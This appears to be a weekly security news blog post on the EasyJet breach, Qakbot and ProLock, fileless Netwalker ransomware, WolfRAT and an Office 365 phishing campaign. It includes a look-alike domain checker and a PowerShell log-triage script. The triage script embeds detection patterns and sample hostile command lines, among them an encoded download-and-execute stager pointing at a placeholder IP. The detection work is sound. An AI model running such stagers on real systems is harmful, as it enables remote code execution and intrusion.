What’s happened in the last seven days of cyber security slip-ups, viral vindictiveness and data disasters? Threat Thursday has the answers
This week: a data breach brings EasyJet down to Earth, while a malware campaign brings two threat groups together in unwelcome harmony.
QueasyJet: Colossal Data Breach is No Plane Sailing for Discount Airline
Everyone’s favourite tangerine provider of discount holiday packages has suffered a bumpy landing. EasyJet confirmed earlier this week that nine million – yes, that many – customers were affected by a company-wide data breach, with 2,208 of those victims also having their payment card details accessed.
EasyJet became aware of the attack in January, but is only now coming forward with the details after confirming the scale of the breach. In a statement to the BBC, EasyJet said: “It took time to understand the scope of the attack and to identify who had been impacted… We could only inform people once the investigation had progressed enough that we were able to identify whether any individuals have been affected, then who had been impacted and what information had been accessed.”
According to an EasyJet spokesperson, the attack was carried out by a “highly sophisticated attacker”, and anybody who has ever purchased an EasyJet flight will now need to be extra vigilant against phishing attempts. That’s… not exactly a narrow demographic.
While it has been suggested that the attack was likely aimed at EasyJet’s internal systems rather than its customers, those customers have nonetheless become high-profile casualties. A spokesperson for the Information Commissioner’s Office concurs, advising people “… to be cautious of any communications purporting to come from EasyJet or EasyJet Holidays”.
This is no small breach, not least because every previous EasyJet customer is now a potential phishing target. There is also a worrying precedent from the last airline to suffer a colossal data breach, British Airways: a 2019 ICO investigation found its cyber security provisions lacking, and the proposed £183.39 million GDPR fine was among the UK’s first and largest. If EasyJet’s attacker really was as sophisticated as the company claims, it may escape blame; but history suggests that not even billion-pound airlines have their cyber security perfected.
If it Locks like a Bot, and Qaks like a Bot….
The Qakbot banking trojan, infamous for its sophistication and its ability to evade detection, has teamed up with the burgeoning ransomware ProLock to become a combined force of misery.
ProLock rose to prominence in the cyber crime world in April, following its successful breach of retail tech company Diebold Nixdorf. ProLock’s operators typically gain their initial foothold through poorly protected Remote Desktop Protocol (RDP) servers before deploying the ransomware, while Qakbot arrives via Emotet and phishing campaigns (like every other malware in existence, apparently) as part of its credential-stealing M.O.
Combined, of course, the two have some pretty nasty capabilities: sneaking onto unsecured networks, pilfering data unnoticed, and extorting the victim for a cash settlement long after making off with the goods is just one likely playbook.
A security alert from the FBI and an analysis by Group-IB first reported this troubling development earlier in the week, detailing further attacks on healthcare facilities, government departments, retailers and financial services firms. They also report that paying the ransom is highly unlikely to get victims’ data back safely: the FBI warns that ProLock’s decryptor does not work reliably and can corrupt files rather than recover them.
Those in the affected industries are advised to familiarise themselves with the signs of phishing emails and dump said emails straight into the virtual trash. As always, treat any unexpected email with suspicion, and take an extra-cautious look at the sender’s details: is that domain really as legitimate as it seems?
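To make the “is that domain really legit?” check concrete, here is an added Python example (not code from EasyJet, the FBI, Group-IB or anyone else mentioned in this post) that classifies the sender domain of a From: header against a constructed list of domains we trust. It catches the usual tricks: a brand name stuffed into a subdomain or a hyphenated look-alike, a one-character typosquat, and homoglyph or digit substitutions, including internationalised (punycode) domains. The trusted list, the confusables map and every sample address are constructed for illustration.

```python
"""Classify the sender domain of an e-mail against domains we actually trust.

Added example for this article; not code from any party mentioned in it.
The trusted list, confusables map and sample addresses are constructed.
"""
import re
import unicodedata

# Constructed allowlist. Entries must already be lower-case ASCII letters
# only, or the skeleton comparison below would fold them incorrectly.
TRUSTED = {"easyjet.com", "cofense.com"}

# Characters commonly swapped in for ASCII letters: digit-for-letter
# typosquats plus a handful of Cyrillic/Greek homoglyphs. A production
# system would use the full Unicode confusables table (UTS #39).
CONFUSABLES = str.maketrans({
    "0": "o", "1": "l", "3": "e", "5": "s",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0455": "s", "\u0456": "i", "\u0458": "j", "\u04bb": "h", "\u0501": "d",
    "\u03b1": "a", "\u03b9": "i", "\u03bf": "o", "\u0131": "i",
})


def sender_domain(from_header: str) -> str:
    """Pull the domain out of a From: header and decode any xn-- (IDNA) labels."""
    # Take the last "@..." token so a display name like "it@support" is ignored.
    hits = re.findall(r"@([^\s<>\"']+)", from_header)
    domain = hits[-1].lower().rstrip(".") if hits else ""
    try:
        domain = domain.encode("ascii").decode("idna")   # xn--... -> Unicode
    except UnicodeError:
        pass  # raw Unicode already present, or malformed punycode: compare as-is
    return domain


def skeleton(domain: str) -> str:
    """Fold a domain to an ASCII 'skeleton' so visual look-alikes collide."""
    folded = unicodedata.normalize("NFKC", domain).translate(CONFUSABLES)
    return folded.replace("rn", "m").replace("vv", "w")


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, used to catch one-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(from_header: str) -> str:
    """One of: trusted, trusted-subdomain, lookalike, typosquat, brand-abuse, unrelated."""
    domain = sender_domain(from_header)
    if domain in TRUSTED:
        return "trusted"
    if any(domain.endswith("." + t) for t in TRUSTED):
        return "trusted-subdomain"
    sk = skeleton(domain)
    if sk in TRUSTED or any(sk.endswith("." + t) for t in TRUSTED):
        return "lookalike"  # matches only once homoglyphs/digits are folded away
    labels = sk.split(".")
    # Crude registrable label: the second-to-last one. Real code should consult
    # the Public Suffix List so that e.g. "example.co.uk" is handled properly.
    sld = labels[-2] if len(labels) >= 2 else labels[0]
    for trusted in TRUSTED:
        brand = trusted.split(".")[0]
        if sld != brand and edit_distance(sld, brand) <= 1:
            return "typosquat"
        # Brand used as a whole token where it does not belong, e.g.
        # easyjet-refunds.com or easyjet.com.evil.org
        if re.search(rf"(^|[.-]){re.escape(brand)}($|[.-])", sk):
            return "brand-abuse"
    return "unrelated"


if __name__ == "__main__":
    for hdr in ["EasyJet <noreply@easyjet.com>", "<info@\u0435asyjet.com>",
                "support@easyjett.com", "EasyJet <noreply@easyjet-refunds.com>"]:
        print(f"{hdr!r:45} -> {classify(hdr)}")
```

Anything other than `trusted` or `trusted-subdomain` is a reason to pick up the phone rather than click the link; `lookalike` and `brand-abuse` verdicts are the ones worth feeding into a mail gateway rule, since they are almost never legitimate.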
Of course, this isn’t the first time two successful malware strains have leapt into bed with one another. Maze and Ryuk were getting all chummy-chummy earlier this year, and these coordinated, tag-team attacks are likely to become more common in the world of cyber crime going forward. The real question, however, is which duo will be the first to have a falling-out, and initiate brutal viral warfare against one another? I’ll grab the popcorn.
Netwalker now Fileless as Well as Paperless
The Netwalker ransomware has adopted an increasingly common and frustrating approach to infiltration: ‘fileless’ threats.
Unlike typical infections, a fileless threat never writes its payload to disk as an executable; it is loaded straight into memory, usually by a script, which leaves far fewer artefacts for defenders to trace. Typically the malicious code runs inside trusted, already-installed tooling, abusing the legitimate scripting features of PowerShell and WMI, or (historically) flaws in plug-ins such as Flash, so that nothing suspicious ever touches the hard drive. Thankfully, these attacks still rely on the usual social engineering to get onto a system in the first place; so while the infections are harder to trace, they are no more difficult to avoid than the usual phishing attempts.
In a blog post this Monday, Trend Micro warned that ColdLock and now Netwalker are leveraging these techniques. As Trend Micro explains, Netwalker is less than a year old and began recruiting affiliates as recently as March this year to build out its ransomware-as-a-service model. It’s likely that the Netwalker strain will kick off a series of threat campaigns in the near future, and a number of repeat headlines in upcoming Threat Thursdays.
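Because a fileless attack leaves no executable to scan, detection shifts to how the trusted tooling was invoked. The Python below is an added example (not Trend Micro’s detection logic, and not anything from the Netwalker analysis) that scores process-creation records for the tradecraft described above: PowerShell launched hidden with profile and execution policy disabled, an -EncodedCommand blob that decodes to a download-and-execute stager, reflective assembly loading from memory, and WMI used to spawn the interpreter. The log format and every sample command line are constructed for this example; in practice the command lines would come from Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1.

```python
"""Score process-creation log lines for 'fileless' PowerShell / WMI tradecraft.

Added example for this article, not any vendor's detection code. The log
format ("pid<TAB>parent<TAB>commandline") and the sample lines are constructed.
"""
import base64
import re

# (indicator name, regex matched case-insensitively against a command line)
INDICATORS = [
    ("hidden-window",     r"-w(?:indowstyle)?\s+hidden"),
    ("no-profile",        r"-nop(?:rofile)?\b"),
    ("non-interactive",   r"-noni(?:nteractive)?\b"),
    ("policy-bypass",     r"-e(?:p|xec|xecutionpolicy)\s+bypass"),
    ("invoke-expression", r"\biex\b|invoke-expression"),
    ("remote-download",   r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"),
    ("in-memory-load",    r"reflection\.assembly\]::load|frombase64string|gzipstream|virtualalloc"),
    ("wmi-spawn",         r"\bwmic\b.*process\s+call\s+create|invoke-wmimethod|win32_process"),
    ("lolbin",            r"\bmshta\b|regsvr32.*scrobj|rundll32.*javascript:"),
]
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts all four)
ENCODED = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE script hidden behind -EncodedCommand, or '' if none."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""  # not a real encoded command; the raw-text indicators still apply


def analyse(cmdline: str) -> dict:
    """Collect indicator hits for one command line, including inside any encoded blob."""
    hits = [name for name, pattern in INDICATORS if re.search(pattern, cmdline, re.I)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits.append("encoded-command")
        hits += ["encoded:" + name for name, pattern in INDICATORS
                 if re.search(pattern, decoded, re.I)]
    # A lone -NoProfile is everyday admin use. Two or more independent indicators,
    # anything found inside an encoded blob, or in-memory loading is worth triage.
    severe = "in-memory-load" in hits or any(h.startswith("encoded:") for h in hits)
    return {"cmdline": cmdline, "hits": hits, "decoded": decoded,
            "suspicious": severe or len(hits) >= 2}


def triage(log_lines) -> list:
    """Parse constructed 'pid\\tparent\\tcommandline' records; return the suspicious ones."""
    findings = []
    for line in log_lines:
        if not line.strip() or line.startswith("#"):
            continue
        pid, parent, cmdline = line.rstrip("\n").split("\t", 2)
        result = analyse(cmdline)
        if result["suspicious"]:
            result.update(pid=int(pid), parent=parent)
            findings.append(result)
    return findings


# Constructed stager, encoded the way PowerShell expects (-enc takes UTF-16LE base64).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()

SAMPLE_LOG = [  # constructed records: pid, parent image, command line
    "4120\texplorer.exe\tpowershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    "4188\twinword.exe\tpowershell.exe -nop -w hidden -enc " + ENC,
    '4201\twmiprvse.exe\tpowershell.exe -NonInteractive -ExecutionPolicy Bypass '
    '-Command "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))"',
    '4230\tcmd.exe\twmic process call create "powershell -w hidden -nop -c iex(gc c:\\users\\public\\u.txt)"',
    "4299\tsvchost.exe\tWmiPrvSE.exe -secured -Embedding",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"pid {f['pid']} (parent {f['parent']}): {', '.join(f['hits'])}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Note the second record: a Word document spawning a hidden PowerShell with an encoded blob is the classic fileless entry point, and only decoding the blob reveals the download-and-execute stager. The first record, a plain `-NoProfile` listing run from Explorer, is deliberately left below the threshold so the rule does not page you every time an administrator opens a console.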
Now’s a good time to remind you all that it isn’t just suspicious files that can help the spread of malware; sometimes, all it takes is clicking on the wrong link. With Netwalker seemingly upping its game, now’s the time to up our own if we’re to keep ourselves protected.
…And Out Come the Wolves
A new piece of Android malware, named WolfRAT by the cyber security boffins at Cisco Talos, is currently in active development. It targets users of popular messaging apps such as WhatsApp and Facebook Messenger, and currently appears to be aimed at victims in Thailand. The likely developers are thought to be linked to Germany-based Wolf Research, which had previously sold surveillance technologies to European governments as recently as 2018.
While Wolf Research was disbanded some time ago, Talos notes striking similarities between the way WolfRAT is built and the now-defunct developer’s previous work, and surmises that although Wolf Research is no more, its legacy lives on through some of its former members. Talos also notes some convincing links to Cyprus-based interception technology specialists Coralco Tech.
The malware, thought to be a remote credential-gathering tool, is believed to spread via phishing campaigns and to disguise itself as legitimate-looking apps such as Google Play. Once installed, it begins snaffling up details from any and all messaging apps. Line, a popular messaging app in Thailand, is the most commonly targeted, but WhatsApp, Facebook Messenger and SMS are also at risk. While this one is currently aimed at victims overseas, it’s still worth keeping an eye on this capable consortium lest they take their efforts worldwide.
Man the Lifeboats! Not even 2FA can Prevent this Latest Office 365 Phishing Campaign
Cofense’s Phishing Defense Center has uncovered a new phishing campaign which gets at user data without ever needing to defeat two-factor authentication.
The phishing email lures in its victims with the ever-tantalising promise of a bonus package for Q1. As with last week’s Microsoft Teams phishing email, it accurately mimics the look of a SharePoint-hosted file, in this case a PDF. Clicking it takes the user to the Microsoft Online login page.
Here’s where it all gets a little technical. The Microsoft login page itself is entirely legitimate, but a certain amount of what we in the business call “jiggery-pokery” involving a Bulgarian URL allows the threat actors to bypass the usual safeguards. As is usually the case, the researchers describe it far better than I can in their technical write-up.
From here, the hapless victim receives no Q1 bonus, but does potentially have their login credentials stolen, and their data held to ransom if the criminals are feeling especially cheeky. As such, if you receive an email to the above effect, it’s safe to assume you’re not getting the bonus you’ve been promised. Well, okay, you might be, but check with your manager first rather than trusting an anonymous email. Who knows? Your workplace vigilance might even land you that raise you’ve always wanted. It’s win-win.
Thus concludes another Threat Thursday – but dry those eyes, for we’ll return next week with more of the latest rumbles and grumbles from the world of cyber security.